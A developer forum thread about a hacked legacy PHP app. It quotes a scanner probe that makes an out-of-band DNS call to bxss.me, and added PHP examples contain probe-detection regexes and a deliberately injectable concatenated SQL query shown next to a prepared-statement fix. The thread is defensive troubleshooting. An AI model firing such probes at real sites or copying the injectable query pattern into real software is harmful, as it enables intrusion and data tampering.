
FutureWeb wrote:

SQL injection attacks

Hi Lara peeps

I know this isn't really Laravel related, but I have a legacy app I am working on which has been hacked. I am seeing query strings like this:

?exp_slug=".gethostbyname(lc("hitox"."axwtshsj065b3.bxss.me."))."A".chr(67).chr(hex("58")).chr(104).chr(78).chr(111).chr(65)."&exp_slugs=73rk535&tmcs=6dwkqvu&tmcv=36&tmrl=civ0lus&tmsb=at9zrcl&tmsl=email-capture-popover&tmty=w

I know gethostbyname is a Linux function to return IP and host info, and I can only assume the app in question has undergone some sort of SQL injection attack, as there are a number of gibberish records added to a couple of the database tables.

I am in the process of moving the whole thing over to a new Laravel app, but the powers that be keep sidelining it.

I am not sure where to begin finding the security hole. It was hacked in the same way several months ago, and I discovered there were a number of crons sat in the public folder that spoofed the admin session in order to run. I moved those to a private off-root directory and assumed that was the cause, but now I have no clue.

Any help pointing me in the right direction would be greatly appreciated.

0 likes
7 replies
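One defender-side starting point for the situation described above is to triage the web server's access log for the same kind of probe that turned up in the query string. The script below is an added example, not code from the thread or from the legacy app: the log lines are constructed samples in Apache combined format (the second one reproduces the bxss.me probe quoted above), and the pattern list is an assumption based only on what that probe contains.

```php
<?php
// Added example (not from the thread): flag access-log requests that carry the
// out-of-band scanner probe quoted in the post, so the affected endpoint and
// parameter can be found and audited first. Sample lines are constructed.

declare(strict_types=1);

// Constructed sample log lines (Apache combined format), not real traffic.
const SAMPLE_LOG = <<<'LOG'
203.0.113.10 - - [12/May/2025:10:01:02 +0000] "GET /index.php?exp_slug=laravel-tips HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.77 - - [12/May/2025:10:01:09 +0000] "GET /index.php?exp_slug=%22.gethostbyname(lc(%22hitox%22.%22axwtshsj065b3.bxss.me.%22)).%22A%22.chr(67).chr(hex(%2258%22))&tmsl=email-capture-popover HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.77 - - [12/May/2025:10:01:10 +0000] "GET /index.php?exp_slug=email-capture-popover%27 HTTP/1.1" 500 0 "-" "Mozilla/5.0"
LOG;

// Patterns whose presence in a decoded query string marks a probe. Each is
// taken from the request quoted in the thread; the set is an assumption and
// would be tuned to the application's own parameters.
const PROBE_PATTERNS = [
    'acunetix-oob-domain' => '/bxss\.me/i',
    'code-eval-probe'     => '/gethostbyname\s*\(|chr\s*\(\s*\d+\s*\)|hex\s*\(/i',
    'stray-single-quote'  => "/'/",
];

// Parse one combined-format line into ip, time, method, path, decoded query
// and status. Returns null for lines that do not match the format.
function parseLine(string $line): ?array
{
    if (!preg_match('/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/', $line, $m)) {
        return null;
    }
    $parts = parse_url($m[4]) ?: [];
    return [
        'ip'     => $m[1],
        'time'   => $m[2],
        'method' => $m[3],
        'path'   => $parts['path'] ?? $m[4],
        // Decode so %22 and %27 become the quotes the scanner actually sent.
        'query'  => rawurldecode($parts['query'] ?? ''),
        'status' => (int) $m[5],
    ];
}

// Return every entry that matches at least one probe pattern, with the reasons.
function findProbes(string $log): array
{
    $hits = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        $entry = parseLine($line);
        if ($entry === null) {
            continue;
        }
        $reasons = [];
        foreach (PROBE_PATTERNS as $name => $regex) {
            if (preg_match($regex, $entry['query'])) {
                $reasons[] = $name;
            }
        }
        if ($reasons !== []) {
            $entry['reasons'] = $reasons;
            $hits[] = $entry;
        }
    }
    return $hits;
}

// Run over the constructed sample; on a real box, read the log file instead.
foreach (findProbes(SAMPLE_LOG) as $hit) {
    printf("%s %s %s %s?%s -> %s\n",
        $hit['time'], $hit['ip'], $hit['status'], $hit['path'], $hit['query'],
        implode(',', $hit['reasons']));
}
```

The second and third sample lines are reported; the first is not. Running this over the real log narrows the hunt to the script and parameter the probes were aimed at (here index.php and exp_slug), which is where to read the SQL first.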
SamAsEnd wrote:

It's been scanned by Acunetix, a pentest tool, and the domain bxss.me is from Acunetix.

1 like
SamAsEnd wrote:

You might scan it using Acunetix to see what it's getting, but it's a bit expensive. You can also use other open-source tools, but I believe you still need professional assistance.

1 like
FutureWeb wrote:

Thanks, yep, I did spot that too. Do you have any suggestions of open source tools that could help?

I am thinking of a blanket $_POST & $_GET sanitization, not entirely sure where to start, something like:

$_POST = array_map('sanitize_input',$_POST);

SamAsEnd wrote:

I don't think you can secure a whole system with quick dirty tricks like that. Security doesn't work that way. Buying an expensive WAF (Web Application Firewall) wouldn't cut it either. Migrating to Laravel and vigilance are your best hope.

You can start with ZAP (Zed Attack Proxy) or Nikto. They are great open-source tools and my favorites.

Good luck.

FutureWeb wrote:

Thanks, I agree, but this is an inherited legacy procedural PHP app with thousands of SQL statements. I am just trying to find a quick and dirty way to shore it up while I port it over to a Laravel app. I really don't want to spend much time on it as it's being replaced.

jlrdw wrote:

Laravel has getPdo(), so you could fairly quickly convert to Laravel yet still use regular queries. But do bind the parameters.
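To make concrete both the blanket-sanitization idea raised earlier in the thread and the "bind the parameters" advice in the reply above, here is an added example (not code from the thread, the legacy app, or Laravel itself) that puts the injectable string-concatenation form of a query next to its prepared-statement form. It uses PHP's own PDO against an in-memory SQLite database so it runs stand-alone; the experiences table, its rows and the inputs are constructed.

```php
<?php
// Added example, not from the thread. Same query written two ways: spliced
// into the SQL text (injectable) and as a PDO prepared statement with a bound
// parameter. In-memory SQLite, constructed table and rows.

declare(strict_types=1);

function makeDb(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    // Raise exceptions instead of returning false, so failures are visible.
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE experiences (id INTEGER PRIMARY KEY, slug TEXT NOT NULL, title TEXT NOT NULL)');
    $pdo->exec("INSERT INTO experiences (slug, title) VALUES
        ('email-capture-popover', 'Email capture'),
        ('laravel-tips', 'Laravel tips')");
    return $pdo;
}

// Vulnerable form: the request value becomes part of the SQL text, so any
// quote or SQL syntax inside it is parsed as SQL. No amount of input
// "sanitizing" layered in front of this is a reliable fix.
function findBySlugUnsafe(PDO $pdo, string $slug): array
{
    $sql = "SELECT id, title FROM experiences WHERE slug = '" . $slug . "'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened form: the SQL text is fixed; the value travels separately as a
// bound parameter and is never parsed as SQL.
function findBySlugSafe(PDO $pdo, string $slug): array
{
    $stmt = $pdo->prepare('SELECT id, title FROM experiences WHERE slug = :slug');
    $stmt->execute([':slug' => $slug]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$pdo = makeDb();

// Ordinary input: both forms return the same row.
$normal = 'laravel-tips';
echo json_encode(findBySlugSafe($pdo, $normal)), PHP_EOL;
echo json_encode(findBySlugUnsafe($pdo, $normal)), PHP_EOL;

// Input carrying a stray single quote (constructed; mangled input or a scanner
// probe would look like this). The prepared statement simply finds no row;
// the concatenated statement is no longer valid SQL.
$withQuote = "email-capture-popover'";
echo json_encode(findBySlugSafe($pdo, $withQuote)), PHP_EOL;
try {
    findBySlugUnsafe($pdo, $withQuote);
} catch (PDOException $e) {
    echo 'concatenated query failed: ', $e->getMessage(), PHP_EOL;
}
```

In the Laravel port the same PDO object comes from DB::connection()->getPdo(), so findBySlugSafe() works unchanged there, and DB::select('... WHERE slug = ?', [$slug]) binds in the same way. On MySQL, also set PDO::ATTR_EMULATE_PREPARES to false so the binding is done by the server rather than by client-side escaping.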
